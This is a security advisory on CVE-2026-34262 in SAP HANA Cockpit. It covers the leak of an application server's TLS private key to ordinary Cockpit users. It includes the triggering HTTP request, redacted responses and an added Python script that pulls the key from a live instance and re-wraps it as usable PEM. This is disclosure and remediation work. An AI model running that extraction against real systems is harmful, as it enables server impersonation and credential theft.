SEC Consult Vulnerability Lab Security Advisory < 20260415-0 >
=======================================================================
title: Exposed Private Key of X.509 Certificate
product: SAP HANA Cockpit & SAP HANA Database Explorer
vulnerable version: HANA Cockpit <2.18.2 (HRTT <2.16.254002)
fixed version: HANA Cockpit 2.18.2 (HRTT 2.16.254002)
CVE number: CVE-2026-34262
impact: high
homepage: https://www.sap.com/
found: 2025-04-24
by: Ben Samtleben (Office Berlin)
    Bernd Kaufmann (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"SAP is one of the world’s leading producers of software for the management
of business processes."
Source: https://www.sap.com/about/what-is-sap.html
"SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA
cockpit provides tools for the administration and monitoring of SAP HANA
databases (databases), and for development capabilities through the SAP
HANA database explorer."
Source: https://help.sap.com/docs/SAP_HANA_COCKPIT/df02d156db744412ad1f9e887aba68ad/ab5d442cc8a340fea07c15ef6f8eb537.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately, see
SAP Security Note 3730639 (https://me.sap.com/notes/3730639).
The patch does not address the risk that the private keys were already
obtained by an attacker before it was applied. Therefore, SEC Consult strongly
recommends rotating the affected X.509 certificates and corresponding private
keys, even though this is currently not mentioned in the SAP Security Note.
SEC Consult highly recommends performing a thorough security review of the
product by security professionals to identify and resolve potential further
security issues.
Vulnerability overview/description:
-----------------------------------
1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
SAP HANA Cockpit users with access to the Database Explorer can obtain the
X.509 certificate issued to the application server together with its private
key. With this material an attacker can impersonate the application server at
the network level and capture user credentials or other sensitive data. The
issue arises when mutual TLS (mTLS) is configured for the communication with
the SAP HANA database.
Proof of concept:
-----------------
1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
When accessing the Database Explorer via the SAP HANA Cockpit, the following
HTTP request is sent to the HRTT service in the background:
GET /hrtt-service/sap/hana/cst/api/v2/databases HTTP/1.1
Host: hana-cockpit-web-app.example.org:31033
Cookie: JSESSIONID=[...]
[...]
The server response contains a list of all available databases.
{
  "__count": 6,
  "d": {
    "results": [
      {
        "__metadata": {
          "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
          "type": "database.Database"
        },
        "id": "C123456789",
        "group_id": 0,
        "catalog_name": "SID@SID",
        "type": "COCKPIT_RESOURCE",
        "disabled": false,
        "has_login": false,
        "cockpit_resource_id": 123456789,
        "database_product_name": "HANA",
        "options": {
          "schema_filter": "[]"
        },
        "set_xs_applicationuser": true,
        "hdl_support_sof": false
      },
      // [... more entries here ...]
    ]
  }
}
However, the response varies, most likely depending on which other HTTP
requests have been sent beforehand. A more verbose response can be triggered
by manually interacting with the Database Explorer (no database credentials
are needed) and then repeating the request. The following information is then
returned:
{
  "__count": 6,
  "d": {
    "results": [
      {
        "__metadata": {
          "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
          "type": "database.Database"
        },
        "id": "C123456789",
        "group_id": 0,
        "catalog_name": "SID@SID",
        "type": "COCKPIT_RESOURCE",
        "disabled": false,
        "has_login": false,
        "cockpit_resource_id": 123456789,
        "database_product_name": "HANA",
        "cockpit_resource_name": "SID@SID",
        "options": {
          "hosts": [
            {
              "host": "isidhdb01.example.org",
              "port": "31013"
            }
          ],
          "databaseName": "SID",
          "encrypt": true,
          "ca": [
            "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]zg==\n-----END CERTIFICATE-----\n",
            "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]c4=\n-----END CERTIFICATE-----\n"
          ],
          "sslValidateCertificate": true,
          "key": [
            "-----BEGIN PRIVATE KEY-----MII[... private key removed ...]8tQ==-----END PRIVATE KEY-----"
          ],
          "cert": [
            "-----BEGIN CERTIFICATE-----MII[... certificate removed ...]QHvC-----END CERTIFICATE----------BEGIN CERTIFICATE-----MII[...]yotP-----END CERTIFICATE-----"
          ],
          "schema_filter": "[]"
        },
        "set_xs_applicationuser": true,
        "hdl_support_sof": false
      },
      // [... more entries here ...]
    ]
  }
}
The HTTP response not only leaks additional metadata but, most importantly, an
X.509 certificate chain and the private key of the leaf certificate. This
certificate is issued to the application server hosting the SAP HANA Cockpit,
not to the database server.
The vulnerability can be reproduced with both the Cockpit Administrator and the
Cockpit User role, so it does not require administrative privileges.
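The following Python script is an added example; it is not part of the original advisory and not SAP code. It replays the request shown above (session cookie only; the path is the one from the advisory, everything else about how it is called is an assumption), splits the concatenated PEM blobs found in the "key", "cert" and "ca" entries into individual objects, re-wraps them as standard PEM, and computes the SHA-256 fingerprint of every leaked certificate. The fingerprints also serve as the check for the rotation recommended in the business recommendation: after the certificates have been replaced, the certificate the server presents must no longer match any of them. The sample response at the bottom is constructed to mirror the verbose response quoted above; its base64 payloads are placeholder bytes, not real keys or certificates.

```python
"""Pull the leaked private key and certificate chain out of the HRTT
"/api/v2/databases" response. Added example; not SEC Consult or SAP code."""
import base64
import hashlib
import json
import re
import textwrap
import urllib.request

DATABASES_PATH = "/hrtt-service/sap/hana/cst/api/v2/databases"

# One PEM object: header, base64 body, footer. re.S lets the body span
# lines; the leaked "key" entry contains no line breaks at all.
PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.S)

def fetch_databases(base_url, jsessionid):
    """Replay the request the Database Explorer sends in the background
    (session cookie only, no database credentials). Network call; the
    offline demo at the bottom does not use it."""
    req = urllib.request.Request(base_url.rstrip("/") + DATABASES_PATH,
                                 headers={"Cookie": "JSESSIONID=" + jsessionid})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)

def split_pem(blob):
    """Split one or more concatenated PEM objects into (label, DER) pairs.
    Handles the leaked "cert" entry, where leaf and issuer are joined with
    no newline between footer and header, and the "ca" entries, which do
    contain newlines."""
    return [(label, base64.b64decode(re.sub(r"\s+", "", body), validate=True))
            for label, body in PEM_BLOCK.findall(blob)]

def to_pem(label, der):
    """Re-emit DER as RFC 7468 PEM with 64-column base64 lines, the layout
    openssl and TLS libraries expect."""
    b64 = base64.b64encode(der).decode("ascii")
    return "-----BEGIN {0}-----\n{1}\n-----END {0}-----\n".format(
        label, "\n".join(textwrap.wrap(b64, 64)))

def sha256_fingerprint(der):
    """Colon-separated SHA-256 fingerprint, the format printed by
    'openssl x509 -noout -fingerprint -sha256'."""
    h = hashlib.sha256(der).hexdigest().upper()
    return ":".join(h[i:i + 2] for i in range(0, len(h), 2))

def find_leaked_material(response_json):
    """One record per database entry whose options carry a private key:
    resource name, target hosts, normalised key PEM(s) and the fingerprint
    of every certificate in the "cert" entry."""
    findings = []
    for entry in response_json["d"]["results"]:
        opts = entry.get("options") or {}
        if not opts.get("key"):
            continue
        keys = [der for blob in opts["key"] for _, der in split_pem(blob)]
        certs = [der for blob in opts.get("cert", []) for _, der in split_pem(blob)]
        findings.append({
            "resource": entry.get("cockpit_resource_name", entry["id"]),
            "hosts": ["%s:%s" % (h["host"], h["port"]) for h in opts.get("hosts", [])],
            "key_pem": [to_pem("PRIVATE KEY", d) for d in keys],
            "cert_fingerprints": [sha256_fingerprint(d) for d in certs],
        })
    return findings

def is_rotated(served_der, leaked_fingerprints):
    """Post-rotation check: the certificate the server presents now (e.g.
    ssl.get_server_certificate() fed through ssl.PEM_cert_to_DER_cert())
    must not match any leaked certificate."""
    return sha256_fingerprint(served_der) not in set(leaked_fingerprints)

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample mirroring the verbose response quoted in the advisory.
# The base64 payloads are placeholder bytes, not real keys or certificates.
SAMPLE_RESPONSE = {"d": {"results": [
    {"id": "C000000001", "cockpit_resource_name": "OTHER@OTHER",
     "options": {"schema_filter": "[]"}},
    {"id": "C123456789", "cockpit_resource_name": "SID@SID",
     "options": {
         "hosts": [{"host": "isidhdb01.example.org", "port": "31013"}],
         "encrypt": True,
         "ca": ["-----BEGIN CERTIFICATE-----\n" + _b64("constructed-ca")
                + "\n-----END CERTIFICATE-----\n"],
         "key": ["-----BEGIN PRIVATE KEY-----" + _b64("constructed-key")
                 + "-----END PRIVATE KEY-----"],
         "cert": ["-----BEGIN CERTIFICATE-----" + _b64("constructed-leaf")
                  + "-----END CERTIFICATE----------BEGIN CERTIFICATE-----"
                  + _b64("constructed-issuer") + "-----END CERTIFICATE-----"]}},
]}}

if __name__ == "__main__":
    for f in find_leaked_material(SAMPLE_RESPONSE):
        print(f["resource"], f["hosts"], f["cert_fingerprints"])
        print(f["key_pem"][0])
```

Against a live, unpatched instance the same logic runs as `find_leaked_material(fetch_databases("https://hana-cockpit-web-app.example.org:31033", "<JSESSIONID>"))` after the Database Explorer has been used once in the browser; every resource that comes back with a key_pem entry is one whose certificate and key must be rotated, and the recorded fingerprints can be compared with what the server presents after the rotation.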
Vulnerable / tested versions:
-----------------------------
The following versions are affected:
* SAP HANA Cockpit versions prior to 2.18.2 (SAP HANA Runtime Tools prior to 2.16.254002)
Vendor contact timeline:
------------------------
2025-07-01: Contacting vendor through vulnerability submission web form, receiving
automatic confirmation.
2025-10-13: Recontacting vendor via email after no response.
2025-10-17: Vendor responds, declaring the issue "resolved" by Aug 30 without
further details.
2025-10-29: Inquiring about assigned CVE or SAP Security Note.
2025-11-12: Sending reminder after no response.
2025-11-28: Sending another reminder, still no response.
2025-12-03: Vendor responds with the version containing the patch; states that
no CVE will be assigned.
2025-12-05: Contacting vendor, emphasizing that SAP Security Note and CVE are
essential to inform customers and make them rotate their certificates.
2025-12-10: Vendor responds, requesting time to clarify with internal stakeholders.
2026-02-11: Contacting the vendor again, asking for any updates.
2026-02-12: Vendor responds, reiterating patched version, no mention of SAP Security
Note or CVE.
2026-02-12: Reminding vendor of importance of notifying affected customers due to
required certificate rotation.
2026-02-25: Contacting MITRE regarding CVE assignment dispute.
2026-02-27: Vendor agrees to issuing SAP Security Note and asks to wait with public disclosure.
2026-04-14: SAP Security Note 3730639 (CVE-2026-34262) is published by the vendor.
2026-04-15: Public release of advisory
Solution:
---------
According to SAP, the vulnerability was fixed in SAP HANA Cockpit version 2.18.2 (HRTT version 2.16.254002).
For information on the available patch, please see SAP Security Note 3730639 (https://me.sap.com/notes/3730639).
However, the patch does not address the risk that the private keys were already
obtained by an attacker before it was applied. Therefore, SEC Consult strongly
recommends rotating the affected X.509 certificates and corresponding private
keys, even though this is currently not mentioned in the SAP Security Note.
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application: https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices: https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult
EOF Ben Samtleben, Bernd Kaufmann / @2026
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/